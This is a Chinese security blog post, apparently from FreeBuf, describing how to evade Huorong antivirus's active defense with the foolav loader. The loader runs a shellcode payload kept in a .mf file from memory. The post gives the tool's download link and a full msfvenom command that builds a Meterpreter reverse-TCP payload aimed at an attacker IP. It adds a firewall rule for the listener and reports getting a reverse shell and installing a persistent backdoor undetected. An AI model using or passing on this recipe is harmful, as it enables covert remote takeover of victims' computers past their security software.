关注我们
QRcode 邮件联系 新浪微博
首页 > 系统安全 » 正文

利用.MF后缀文件猥琐绕过火绒杀毒测试

     条点评
后台-系统设置-扩展变量-手机广告位-内容正文顶部

* 本文作者:Backspaces,本文属FreeBuf原创奖励计划,未经许可禁止转载

由于火绒杀毒软件非常“良心”,在国内就是一股清流,逐渐拥有了一大批用户。

最近在做测试,后门文件一直无法绕过火绒的主动防御,最后在Github找到个猥琐绕过火绒主防御的手法的手法,该手法亲测可以成功绕过火绒,所以分享给大家(初次发帖,实属紧张)。

环境攻击机:

CentOS7

192.168.129.128

目标机:

装有火绒的windows10 1709(x64)

192.168.0.32

下载:https://github.com/hvqzao/foolav/releases/download/v1.0/foolav.zip

解压后会有三个文件:foolav.exe执行文件和foolav.mf文件,第三个我们不管它

首先唯一要做的是上传两个文件,一个是可执行的文件(foolav.exe),另一个则是.MF后缀文件,foolav.mf文件用来存放我们的Payload,

foolav.exe是作者写好的,当该文件被执行后,有效载荷文件(foolav.mf)将被它解析,加载到单独的线程,在内存中执行。

源码大家可以到作者的Github上下载

https://github.com/hvqzao/foolav


foolav.mf文件默认是存放着payload的,执行后会弹出一个计算器,我们只要生成自己的payload然后替换原有的内容就好,

MF文件可以区分每一个字符以外的\xHH二进制序列。也就是说你可以在foolav.mf文件里添加你想添加的字符,比如:

x86的payload是运行在x86和x86_64 Windows系统。 我们现在只需要生成x84的payload。Meterpreter可以使用migrate命令嫁接到x64进程中。

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.129.128 Lport=4444 -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf

我这里生成之后覆盖掉了原来的.mf文件

当然还是这些熟悉的命令,如果命令没有出错,现在我们的payload已经生成并保存到了foolav.mf文件当中,然后用我们生成的foolav.mf文件覆盖下载的foolav.mf文件并发送到目标机器。

然后进行监听,等待反向Shell

我的防火墙是打开的,所以默认屏蔽了对外端口,这里需要让iptables允许4444端口通过

iptables -I INPUT -p tcp --dport 4444 -j ACCEPT

上传到目标机之后,我们直接用火绒对文件进行病毒扫描,如图

exe文件运行之后,我们成功获得windows10一个反向的shell

通过此方法执行的payload得到shell后,我们甚至可以执行一些杀毒软件非常敏感的操作,就像是有白名单一样,火绒的主防御形同虚设。。。。比如我们生成一个持久性的服务后门然后再用火绒进行扫描

虽然该方法可以成功的绕过最新版的火绒杀毒和其主防御,但我在装有360和电脑管家的环境进行测试均被查杀…….

* 本文作者:Backspaces,本文属FreeBuf原创奖励计划,未经许可禁止转载

后台-系统设置-扩展变量-手机广告位-内容正文底部
本文标签:
Windows漏洞利用开发教程Part 1
返回列表
  Windows漏洞利用开发教程Part 1 Windows漏洞利用开发教程Part 1  间谍软件Agent Tesla变种再现:通过特制Word文档诱导安装 间谍软件Agent Tesla变种再现:通过特制Wor  勒索病毒“GPGQwerty”的分析与复现 勒索病毒“GPGQwerty”的分析与复现  利用文本编辑器的插件在Unix机器上的实现提权 利用文本编辑器的插件在Unix机器上的实现  基于SYLK文件传播Orcus远控木马样本分析 基于SYLK文件传播Orcus远控木马样本分析  国产吃鸡要凉?荒野行动加速器木马攻击已达10万+ 国产吃鸡要凉?荒野行动加速器木马攻击已达  利用白文件打造超级渗透测试程序的思路分享 利用白文件打造超级渗透测试程序的思路分  一个都不放过!Zenis病毒诠释勒索加密最强等级 一个都不放过!Zenis病毒诠释勒索加密最强

已有条评论,欢迎点评!